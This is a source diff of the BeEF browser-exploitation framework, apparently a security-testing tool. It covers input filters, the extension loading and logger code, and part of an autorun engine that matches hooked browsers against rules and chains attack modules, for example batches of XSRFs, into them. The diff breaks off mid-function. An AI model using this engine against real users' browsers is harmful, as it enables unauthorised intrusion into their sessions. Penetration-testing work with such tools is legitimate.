-    # @todo Wrap the require() statement in a try catch block to allow BeEF to fail gracefully if there is a problem with that extension - Issue #480
     def self.load(ext)
-      if File.exists?('extensions/'+ext+'/extension.rb')
-        require 'extensions/'+ext+'/extension.rb'
+      if File.exist? "#{$root_dir}/extensions/#{ext}/extension.rb"
+        require "#{$root_dir}/extensions/#{ext}/extension.rb"
         print_debug "Loaded extension: '#{ext}'"
-        BeEF::Core::Configuration.instance.set('beef.extension.'+ext+'.loaded', true)
+        BeEF::Core::Configuration.instance.set "beef.extension.#{ext}.loaded", true
         return true
       end
       print_error "Unable to load extension '#{ext}'"
-      return false
+      false
+    rescue => e
+      print_error "Unable to load extension '#{ext}':"
+      print_more e.message
     end
   end
 end

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -9,13 +9,13 @@ module BeEF
     # Returns configuration of all enabled extensions
     # @return [Array] an array of extension configuration hashes that are enabled
     def self.get_enabled
-      return BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select { |k,v| v['enable'] == true }
     end
 
     # Returns configuration of all loaded extensions
     # @return [Array] an array of extension configuration hashes that are loaded
     def self.get_loaded
-      return BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
+      BeEF::Core::Configuration.instance.get('beef.extension').select {|k,v| v['loaded'] == true }
     end
 
     # Load all enabled extensions
@@ -23,12 +23,10 @@ module BeEF
     def self.load
       BeEF::Core::Configuration.instance.load_extensions_config
       self.get_enabled.each { |k,v|
-        BeEF::Extension.load(k)
+        BeEF::Extension.load k
       }
       # API post extension load
-      BeEF::API::Registrar.instance.fire(BeEF::API::Extensions, 'post_load')
+      BeEF::API::Registrar.instance.fire BeEF::API::Extensions, 'post_load'
     end
-
   end
 end
-

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,143 +1,199 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
-  
+
   # Check if the string is not empty and not nil
-  # @param [String] str String for testing
-  # @return [Boolean] Whether the string is not empty
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether the string is not empty
   def self.is_non_empty_string?(str)
     return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
     return false if str.empty?
     true
   end
 
   # Check if only the characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
-  # @param [String] str String for testing
-  # @return [Boolean] Whether or not the only characters in str are specified in chars
+  #   @param [String] chars List of characters to match
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether or not the only characters in str are specified in chars
   def self.only?(chars, str)
     regex = Regexp.new('[^' + chars + ']')
-    regex.match(str).nil?
+    regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
   end
-        
+
   # Check if one or more characters in 'chars' are in 'str'
-  # @param [String] chars List of characters to match
-  # @param [String] str String for testing
-  # @return [Boolean] Whether one of the characters exists in the string
+  #   @param [String] chars List of characters to match
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether one of the characters exists in the string
   def self.exists?(chars, str)
     regex = Regexp.new(chars)
-    not regex.match(str).nil?
+    not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
   end
-        
+
   # Check for null char
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has a null character
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has a null character
   def self.has_null? (str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     exists?('\x00', str)
   end
 
   # Check for non-printable char
-  # @param [String] str String for testing
-  # @return [Boolean] Whether or not the string has non-printable characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] Whether or not the string has non-printable characters
   def self.has_non_printable_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     not only?('[:print:]', str)
   end
 
   # Check if num characters only
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only contains numbers
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only contains numbers
   def self.nums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     only?('0-9', str)
   end
 
   # Check if valid float
-  # @param [String] str String for float testing
-  # @return [Boolean] If the string is a valid float
+  #   @param [String] str String for float testing
+  #   @return [Boolean] If the string is a valid float
   def self.is_valid_float?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not only?('0-9\.', str)
+    return false unless is_non_empty_string?(str)
+    return false unless only?('0-9\.', str)
     not (str =~ /^[\d]+\.[\d]+$/).nil?
   end
 
   # Check if hex characters only
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only contains hex characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only contains hex characters
   def self.hexs_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     only?('0123456789ABCDEFabcdef', str)
   end
 
   # Check if first character is a number
-  # @param [String] String for testing
-  # @return [Boolean] If the first character of the string is a number
+  #   @param [String] String for testing
+  #   @return [Boolean] If the first character of the string is a number
   def self.first_char_is_num?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     not (str =~ /^\d.*/).nil?
   end
 
   # Check for space characters: \t\n\r\f
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has a whitespace character
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has a whitespace character
   def self.has_whitespace_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     exists?('\s', str)
   end
 
   # Check for non word characters: a-zA-Z0-9
-  # @param [String] str String for testing
-  # @return [Boolean] If the string only has alphanums
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string only has alphanums
   def self.alphanums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     only?("a-zA-Z0-9", str)
   end
-        
-  # Check if valid ip address string
-  # @param [String] ip String for testing
-  # @return [Boolean] If the string is a valid IP address
-  # @note only IPv4 compliant
-  def self.is_valid_ip?(ip)
-    return false if not is_non_empty_string?(ip)
-    return true if ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})?$/
+
+  # @overload self.is_valid_ip?(ip, version)
+  # Checks if the given string is a valid IP address
+  #   @param [String] ip string to be tested
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
+  #   @return [Boolean] true if the string is a valid IP address, otherwise false
+  #
+  # @overload self.is_valid_ip?(ip)
+  # Checks if the given string is either a valid IPv4 or IPv6 address
+  #   @param [String] ip string to be tested
+  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
+  def self.is_valid_ip?(ip, version = :both)
+    return false unless is_non_empty_string?(ip)
+    valid = case version.inspect.downcase
+      when /^:ipv4$/
+        ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
+      when /^:ipv6$/
+        ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
+          ([0-9a-f]{1,4}:){1,7}:|
+          ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
+          ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
+          ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
+          ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
+          ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
+          [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
+          :((:[0-9a-f]{1,4}){1,7}|:)|
+          fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
+          ::(ffff(:0{1,4}){0,1}:){0,1}
+          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
+          ([0-9a-f]{1,4}:){1,4}:
+          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
+          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
+      when /^:both$/
+        is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
+    end ? true : false
+
+    valid
+  end
+
+  # Checks if the given string is a valid private IP address
+  #   @param [String] ip string for testing
+  #   @return [Boolean] true if the string is a valid private IP address, otherwise false
+  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
+  def self.is_valid_private_ip?(ip)
+    return false unless is_valid_ip?(ip)
+    return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
+  end
+
+  # Checks if the given string is a valid TCP port
+  #   @param [String] port string for testing
+  #   @return [Boolean] true if the string is a valid TCP port, otherwise false
+  def self.is_valid_port?(port)
+    valid = false
+    valid = true if port.to_i > 0 && port.to_i < 2**16
+    valid
+  end
+
+  # Checks if string is a valid domain name
+  #   @param [String] domain string for testing
+  #   @return [Boolean] If the string is a valid domain name
+  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
+  def self.is_valid_domain?(domain)
+    return false unless is_non_empty_string?(domain)
+    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
     false
   end
 
   # Check for valid browser details characters
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser details characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has valid browser details characters
   # @note This function passes the \302\256 character which translates to the registered symbol (r)
   def self.has_valid_browser_details_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     not (str =~ /[^\w\d\s()-.,;:_\/!\302\256]/).nil?  
   end  
 
   # Check for valid base details characters
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has only valid base characters
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string has only valid base characters
   # @note This is for basic filtering where possible all specific filters must be implemented
   # @note This function passes the \302\256 character which translates to the registered symbol (r)
   def self.has_valid_base_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     (str =~ /[^\302\256[:print:]]/).nil? 
   end  
 
   # Verify the yes and no is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is either 'yes' or 'no'
-  # @todo Confirm this is case insensitive
+  #   @param [String] str String for testing
+  #   @return [Boolean] If the string is either 'yes' or 'no'
   def self.is_valid_yes_no?(str)
     return false if has_non_printable_char?(str)
-    return false if str !~ /^(Yes|No)$/
-    return false if str.length > 200
+    return false if str !~ /\A(Yes|No)\z/i
     true
   end
-  
+
 end
 end

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,19 +10,8 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser name characters
   def self.is_valid_browsername?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     return false if str.length > 2
-    return false if has_non_printable_char?(str)  
-    true
-  end
-
-  # Check the browser type value - for example, {"FF5":true,"FF":true} & {"S":true}
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser type characters
-  def self.is_valid_browsertype?(str)
-    return false if not is_non_empty_string?(str)
-    return false if str.length < 10
-    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -31,8 +20,8 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid Operating System name characters
   def self.is_valid_osname?(str)
-    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str) 
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
     return false if str.length < 2
     true
   end
@@ -41,7 +30,7 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid Hardware name characters
   def self.is_valid_hwname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     return false if has_non_printable_char?(str)
     return false if str.length < 2
     true
@@ -51,11 +40,25 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser version characters
   def self.is_valid_browserversion?(str)
-    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)  
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
     return true if str.eql? "UNKNOWN"
+    return true if str.eql? "ALL"
     return false if not nums_only?(str) and not is_valid_float?(str)  
-    return false if str.length > 10      
+    return false if str.length > 20
+    true
+  end
+
+  # Verify the os version string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid os version characters
+  def self.is_valid_osversion?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return true if str.eql? "UNKNOWN"
+    return true if str.eql? "ALL"
+    return false unless BeEF::Filters::only?("a-zA-Z0-9.<=> ", str)
+    return false if str.length > 20
     true
   end
 
@@ -63,8 +66,8 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser / ua string characters
   def self.is_valid_browserstring?(str)
-    return false if not is_non_empty_string?(str)
-    return false if has_non_printable_char?(str)    
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
     return false if str.length > 300      
     true
   end
@@ -73,33 +76,17 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid cookie characters
   def self.is_valid_cookies?(str)
-    return false if has_non_printable_char?(str)    
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
     return false if str.length > 2000
     true
   end
 
-  # Verify the screen size is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid screen size characters
-  def self.is_valid_screen_size?(str)
-    return false if has_non_printable_char?(str)    
-    return false if str.length > 200
-    true
-  end
-
-  # Verify the window size is valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string has valid window size characters
-  def self.is_valid_window_size?(str)
-    return false if has_non_printable_char?(str)    
-    return false if str.length > 200
-    true
-  end
-
   # Verify the system platform is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid system platform characters
   def self.is_valid_system_platform?(str)
+    return false unless is_non_empty_string?(str)
     return false if has_non_printable_char?(str)
     return false if str.length > 200
     true
@@ -109,6 +96,37 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid date stamp characters
   def self.is_valid_date_stamp?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the CPU type string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid CPU type characters
+  def self.is_valid_cpu?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the memory string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid memory type characters
+  def self.is_valid_memory?(str)
+    return false unless is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
+  # Verify the GPU type string is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid GPU type characters
+  def self.is_valid_gpu?(str)
+    return false unless is_non_empty_string?(str)
     return false if has_non_printable_char?(str)
     return false if str.length > 200
     true
@@ -120,9 +138,9 @@ module Filters
   # @note This string can be empty if there are no browser plugins
   # @todo Verify if the ruby version statement is still necessary
   def self.is_valid_browser_plugins?(str)
-    return true if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     return false if str.length > 1000
-    if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
+    if str.encoding === Encoding.find('UTF-8')
       return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
       return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -11,26 +11,17 @@ module Filters
   # @return [Boolean] If the string has valid path characters
   def self.is_valid_path_info?(str)
     return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
     return false if has_non_printable_char?(str)
     true
   end
 
-  # Check if the command id valid
-  # @param [String] str String for testing
-  # @return [Boolean] If the string is a valid command id
-  def self.is_valid_command_id?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not nums_only?(str)   
-    true
-  end
-
   # Check if the session id valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid hook session id characters
   def self.is_valid_hook_session_id?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str) 
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_key_chars?(str) 
     true
   end
 
@@ -38,8 +29,8 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid command module datastore key characters
   def self.is_valid_command_module_datastore_key?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str)      
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_key_chars?(str)      
     true
   end
 
@@ -48,7 +39,7 @@ module Filters
   # @return [Boolean] If the string has valid command module datastore param characters
   def self.is_valid_command_module_datastore_param?(str)
     return false if has_null?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless has_valid_base_chars?(str)
     true
   end
 
@@ -56,8 +47,8 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid key characters
   def self.has_valid_key_chars?(str)
-    return false if not is_non_empty_string?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless is_non_empty_string?(str)
+    return false unless has_valid_base_chars?(str)
     true
   end
 
@@ -66,9 +57,9 @@ module Filters
   # @return [Boolean] If the sting has valid param characters
   def self.has_valid_param_chars?(str)
     return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
     return false if str.empty?
-    return false if not (str =~ /[^\w_\:]/).nil?
+    return false unless (str =~ /[^\w_\:]/).nil?
     true
   end
 

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,12 +10,10 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string is a valid hostname
   def self.is_valid_hostname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
     return false if has_non_printable_char?(str)
     return false if str.length > 255
     return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
-    return false if not (str =~ /\.\./).nil?
-    return false if not (str =~ /\-\-/).nil?      
     true
   end
 

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,9 +10,9 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string is a valid page title
   def self.is_valid_pagetitle?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
     return false if has_non_printable_char?(str)
-    return false if str.length > 50      
+    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
     true
   end
 
@@ -20,7 +20,7 @@ module Filters
   # @param [String] str String for testing
   # @return [Boolean] If the string is a valid referrer
   def self.is_valid_pagereferrer?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
     return false if has_non_printable_char?(str)
     return false if str.length > 350
     true

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,7 +7,14 @@
 # @note Include here all the gems we are using
 require 'rubygems'
 require 'bundler/setup'
+
+# For some reason, on Ruby 2.5+, msgpack needs to be loaded first,
+# else metasploit integration dies due to undefined `to_msgpack`.
+# Works fine on Ruby 2.4
+require 'msgpack'
+
 Bundler.require(:default)
+
 require 'cgi'
 require 'yaml'
 require 'singleton'
@@ -15,6 +22,28 @@ require 'ipaddr'
 require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
+require 'eventmachine'
+require 'thin'
+require 'rack'
+require 'em-websocket'
+require 'uglifier'
+require 'execjs'
+require 'ansi'
+require 'term/ansicolor'
+require 'json'
+require 'data_objects'
+require 'dm-do-adapter'
+require 'parseconfig'
+require 'erubis'
+require 'mime/types'
+require 'optparse'
+require 'resolv'
+require 'digest'
+require 'zip'
+require 'logger'
+
+# @note Logger
+require 'core/logger'
 
 # @note Include the filters
 require 'core/filters'
@@ -29,4 +58,4 @@ require 'core/api'
 require 'core/settings'
 
 # @note Include the core of BeEF
-require 'core/core'
+require 'core/core'

core/logger.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+#
+# @note log to file
+#
+module BeEF
+  class << self
+    attr_writer :logger
+
+    def logger
+        @logger ||= Logger.new("#{$home_dir}/beef.log").tap do |log|
+        log.progname = self.name
+        log.level = Logger::WARN
+      end
+    end
+  end
+end

core/main/autorun_engine/engine.rb

@@ -0,0 +1,499 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module AutorunEngine
+
+      class Engine
+
+        include Singleton
+
+        def initialize
+          @config = BeEF::Core::Configuration.instance
+
+          @result_poll_interval = @config.get('beef.autorun.result_poll_interval')
+          @result_poll_timeout = @config.get('beef.autorun.result_poll_timeout')
+          @continue_after_timeout = @config.get('beef.autorun.continue_after_timeout')
+
+          @debug_on = @config.get('beef.debug')
+
+          @VERSION = ['<','<=','==','>=','>','ALL']
+          @VERSION_STR = ['XP','Vista']
+        end
+
+        # Check if the hooked browser type/version and OS type/version match any Rule-sets
+        # stored in the BeEF::Core::AutorunEngine::Models::Rule database table
+        # If one or more Rule-sets do match, trigger the module chain specified
+        def run(hb_id, browser_name, browser_version, os_name, os_version)
+          are = BeEF::Core::AutorunEngine::Engine.instance
+          match_rules = are.match(browser_name, browser_version, os_name, os_version)
+          are.trigger(match_rules, hb_id) if match_rules !=nil && match_rules.length > 0
+        end
+
+        # Prepare and return the JavaScript of the modules to be sent.
+        # It also updates the rules ARE execution table with timings
+        def trigger(rule_ids, hb_id)
+
+          hb = BeEF::HBManager.get_by_id(hb_id)
+          hb_session = hb.session
+
+          rule_ids.each do |rule_id|
+            rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
+            modules = JSON.parse(rule.modules)
+
+            execution_order = JSON.parse(rule.execution_order)
+            execution_delay = JSON.parse(rule.execution_delay)
+            chain_mode  = rule.chain_mode
+
+            mods_bodies = Array.new
+            mods_codes = Array.new
+            mods_conditions = Array.new
+
+            # this ensures that if both rule A and rule B call the same module in sequential mode,
+            # execution will be correct preventing wrapper functions to be called with equal names.
+            rule_token = SecureRandom.hex(5)
+
+            modules.each do |cmd_mod|
+              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
+              options = []
+              replace_input = false
+              cmd_mod['options'].each do|k,v|
+                options.push({'name' => k, 'value' => v})
+                replace_input = true if v == '<<mod_input>>'
+              end
+
+              command_body = prepare_command(mod, options, hb_id, replace_input, rule_token)
+
+
+              mods_bodies.push(command_body)
+              mods_codes.push(cmd_mod['code'])
+              mods_conditions.push(cmd_mod['condition'])
+            end
+
+            # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
+            case chain_mode
+              when 'nested-forward'
+                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
+              when 'sequential'
+                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
+              else
+                wrapper = nil
+                print_error "Chain mode looks wrong!"
+                # TODO catch error, which should never happen as values are checked way before ;-)
+            end
+
+            are_exec = BeEF::Core::AutorunEngine::Models::Execution.new(
+                :session => hb_session,
+                :mod_count => modules.length,
+                :mod_successful => 0,
+                :rule_token => rule_token,
+                :mod_body => wrapper,
+                :is_sent => false,
+                :rule_id => rule_id
+            )
+            are_exec.save
+            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
+            print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
+          end
+        end
+
+
+        # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
+        # Launch order is also taken care of.
+        #  - sequential chain with delays (setTimeout stuff)
+        #    ex.: setTimeout(module_one(),   0);
+        #         setTimeout(module_two(),   2000);
+        #         setTimeout(module_three(), 3000);
+        # Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
+        #  what their status will be (for instance, a bunch of XSRFs on a set of targets)
+        def prepare_sequential_wrapper(mods, order, delay, rule_token)
+          wrapper = ''
+          delayed_exec = ''
+          c = 0
+          while c < mods.length
+            delayed_exec += %Q| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
+            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
+            wrapped_mod = "#{mod_body}\n"
+            wrapper += wrapped_mod
+            c += 1
+          end
+          wrapper += delayed_exec
+          print_more "Final Modules Wrapper:\n #{wrapper}" if @debug_on
+          wrapper
+        end
+
+        # Wraps module bodies in their own function, then start to execute them from the first, polling for
+        # command execution status/results (with configurable polling interval and timeout).
+        # Launch order is also taken care of.
+        #  - nested forward chain with status checks (setInterval to wait for command to return from async operations)
+        #    ex.:  module_one()
+        #           if condition
+        #             module_two(module_one_output)
+        #               if condition
+        #                  module_three(module_two_output)
+        #
+        # Note: command result status is checked, and you can properly chain input into output, having also
+        # the flexibility of slightly mangling it to adapt to module needs.
+        # Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
+        #     if the first once return with success. Also, the second module has the possibility of mangling first
+        #     module output and use it as input for some of its module inputs.
+        def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token)
+          wrapper, delayed_exec = '',''
+          delayed_exec_footers = Array.new
+          c = 0
+
+          while c < mods.length
+            if mods.length == 1
+              i = c
+            else
+              i = c + 1
+            end
+
+            code_snippet = ''
+            mod_input = ''
+            if code[c] != 'null' && code[c] != ''
+              code_snippet = code[c]
+              mod_input = 'mod_input'
+            end
+
+            conditions[i] = true if conditions[i] == nil || conditions[i] == ''
+
+            if c == 0
+              # this is the first wrapper to prepare
+              delayed_exec += %Q|
+                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
+                  #{mods[order[c]][:mod_name]}_#{rule_token}();
+
+                  // TODO add timeout to prevent infinite loops
+                  function isResReady(mod_result, start){
+                    if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
+                       // loop
+                    }else{
+                       // module return status/data is now available
+                       clearInterval(resultReady);
+                          if (mod_result === null && #{@continue_after_timeout}){
+                              var mod_result = [];
+                              mod_result[0] = 1; //unknown status
+                              mod_result[1] = '' //empty result
+                          }
+                          var status = mod_result[0];
+                       if(#{conditions[i]}){
+                         #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
+                         #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
+              |
+
+              delayed_exec_footer = %Q|
+                     }
+                    }
+                  }
+                  var start = (new Date()).getTime();
+                  var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
+                }
+                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
+              |
+
+              delayed_exec_footers.push(delayed_exec_footer)
+
+            elsif c < mods.length - 1
